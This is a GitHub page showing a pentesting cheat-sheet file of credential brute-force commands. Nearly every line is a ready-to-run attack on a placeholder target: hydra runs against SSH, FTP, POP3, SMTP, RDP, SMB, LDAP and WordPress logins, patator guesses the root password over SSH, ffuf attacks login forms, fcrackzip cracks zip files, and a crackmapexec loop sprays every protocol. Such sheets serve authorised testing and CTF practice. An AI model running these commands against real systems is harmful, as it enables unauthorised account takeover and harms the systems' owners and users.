forked from esp0xdeadbeef/cheat.sheets
-
Notifications
You must be signed in to change notification settings - Fork 5
/
bruteforce.cheat
64 lines (44 loc) · 2.67 KB
/
bruteforce.cheat
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
% Bruteforce Cheats
$ wordlist: fdfind . $(pwd) /usr/share/{seclists,wordlists} /usr/share/amass/ -Ltf | sort -u
$ user-list: fdfind . $(pwd) /usr/share/{seclists,wordlists} /usr/share/amass/ -Ltf | sort -u
$ pass-list: fdfind . $(pwd) /usr/share/{seclists,wordlists} /usr/share/amass/ -Ltf | sort -u
$ list-hydras-functionality: hydra -h | grep 'Supported' | tr ' ' '\n' | tail -n +3
## ssh section
# Hydra SSH Against Known username on port 22
hydra <ip> -s 22 ssh -l <user-list> -P <pass-list>
# Hydra SSH using list of users and passwords
hydra -v -V -u -L <user-list> -P <pass-list> -t 1 -u <ip> ssh
# Hydra SSH using a known password and a username list
hydra -v -V -u -L <user-list> -p 'known-password' -t 1 -u <ip> ssh
# patator ssh brutefoce 22 with username root
patator ssh_login host=<ip> port=22 user=root password=FILE0 0=<pass-list> --allow-ignore-failures persistent=0 -x ignore:egrep="Authentication failed."
## hydra bruteforcing
# Global functionality unlisted functions for Hydra with user pass list
hydra -L <user-list> -P <pass-list> <ip> <list-hydras-functionality> -V -f
# Hydra FTP known user and password list
hydra -t 1 -l admin -P <pass-list> -vV <ip> ftp
# Hydra POP3 Brute Force
hydra -l <username> -P <pass-list> -f <ip> pop3 -V
# Hydra SMTP Brute Force
hydra -P <pass-list> <ip> smtp -V
# Hydra attack Windows Remote Desktop with password list
hydra -t 1 -V -f -l administrator -P <pass-list> rdp://<ip>
# Hydra brute force SMB user with password list:
hydra -t 1 -V -f -l administrator -P <pass-list> <ip> smb
# SMB Brute Forcing
hydra -L <user-list> -P <pass-list> <ip> smb -V -f
# LDAP Brute Forcing #
hydra -L <user-list> -P <pass-list> <ip> ldap2 -V -f
# Crack Password Protected zip file
fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt <zip-file-location>
## web bruteforcing
# Hydra attack http get 401 login with a dictionary
hydra -L <user-list> -P <pass-list> <ip> http-get /admin
# Hydra brute force a Wordpress admin login
hydra -l admin -P <pass-list> <ip> -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'
# post header bruteforce FUFF clusterbomb
ffuf -w <user-list>:USERFUZZ -w <pass-list>:PASSWORDFUZZ -u <url> -d "username=USERFUZZ&password=PASSWORDFUZZ" -H "Content-type: application/x-www-form-urlencoded" -mode clusterbomb
# FUFF clusterbomb with an request from burp (sed -i 's/your-value-what-needs-to-be-fuzzed/DIRECTORYATTACK/g')
ffuf -request <request> -w <wordlist>:DIRECTORYATTACK -request-proto http
# crackmapexec let's do every protocol (slow)
for i in $(cme | grep '{' | tail -n 1 | cut -d '{' -f 2 | cut -d '}' -f 1 | tr ',' '\n'); do cme $i <ip> -d <domain> -u '<user-list>' -p <pass-list>;done